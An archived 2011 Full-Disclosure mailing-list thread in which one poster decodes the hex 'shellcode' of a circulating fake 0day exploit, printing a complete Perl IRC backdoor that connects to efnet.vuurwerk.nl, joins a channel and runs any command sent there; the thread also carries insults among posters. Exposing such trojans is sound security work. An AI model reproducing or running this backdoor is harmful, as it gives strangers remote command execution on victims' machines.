[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)



sounds really useful...

[waKKu@1215n ~]$ python -c 'hellcode=(
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print 
> hellcode;'
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi
[waKKu@1215n ~]$

print hellcode[764:];'
/tmp/hi


--

On 26 October 2011 13:49, xD 0x41 <secn3t@xxxxxxxxx> wrote:
> yer ofc... anyhow, ignoring you now...
>
> you obv think your some leet troll, your not, your ONLY a TROLL :)
> have a nice day or is that
>
> *Goplamamamama Ignananayu*
>
> forget the jedi oky, you gotta brushup on ya troll trash talk!
> bah hahaha.
> fool
> xd
>
>
> On 26 October 2011 13:44, Antony widmal <antony.widmal@xxxxxxxxx> wrote:
>>
>> Using your smartphone while flipping burger can be dangerous pandawan.
>> More over if you work at burger king.
>>
>>
>>
>> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>
>>> h the idiot who thinks im laurelai... meh , your a fool yourself just for
>>> even thinking that much :s
>>> your but an echo on the list, wich, does not echo the rest of it, wich is
>>> a good place to be.
>>> unfortunately, your one of the few who should just be blocked, for making
>>> absolutely nothing but abusive crap...
>>> your an idiot. not me.
>>> i dont run things, why, have you ran it ?
>>> Is it good ?
>>> hehe... maybe it is!
>>> i guess if hes using it...well...
>>> *sic*
>>>
>>>
>>>
>>> On 26 October 2011 13:21, Antony widmal <antony.widmal@xxxxxxxxx> wrote:
>>>>
>>>> Do yourself a favor and run that code dumbass.
>>>>
>>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>>>
>>>>> I use darknets to help me,
>>>>> they send me the info i need.
>>>>> simple answer to simple question.
>>>>> look them up, they may oneday protect you, also.
>>>>>
>>>>>
>>>>> On 26 October 2011 13:15, adam <adam@xxxxxxxxx> wrote:
>>>>>>
>>>>>> http://home.no/exploited/exploits/kmodaxx.c ;(almost[?] identical code,
>>>>>> claims to be a remote kernel root exploit)
>>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 ;(very
>>>>>> similar code, claims to be an IIS exploit)
>>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 ;(didn't read entire
>>>>>> thread, code is mentioned though)
>>>>>> I'm sure there's more, but this kinda reminds me of that leaked
>>>>>> "private exploit" on pastebin a few weeks back (you know, the one that 
>>>>>> was
>>>>>> nice enough to create a _local_ root account), and insisted that it was
>>>>>> private private private and specifically said NOT to leak it.
>>>>>> I am curious as to how you're so certain that it's on "many many
>>>>>> boxes" yet know next to nothing about it.
>>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>>>>>
>>>>>>> Hello List,
>>>>>>> Id like people to also, like this thread asks, to pls give some
>>>>>>> opinion, other than mine.. wich, i am yet to make;
>>>>>>>
>>>>>>> http://www.hackerthreads.org/Topic-5973
>>>>>>>
>>>>>>> Please look at this .c code on here, if you wish, and tell me, why
>>>>>>> A. It is still in circulation, seeminlgly, on MANY MANY boxes....
>>>>>>> B. people still seem to try keep it private :s
>>>>>>>
>>>>>>> This morning, a friend from webhostingtalk.com ,asked me to take a
>>>>>>> look.
>>>>>>> I have and, i can only sofar say, once i decrypt the shellcode, ill
>>>>>>> know abit more..
>>>>>>> altho , i rmember this thing, and, somany people were after it,
>>>>>>> people were paying for it, this is first time i have seen it actually
>>>>>>> disclosed tho,
>>>>>>> admittedly only looked today.
>>>>>>> If skiddies are using it to ddos things, I want to makesure i can
>>>>>>> expose it, and kill the threats.
>>>>>>> thankyou.
>>>>>>> xd .// exposing bullshit as i ride!
>>>>>>>
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
--
Best regards,

Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/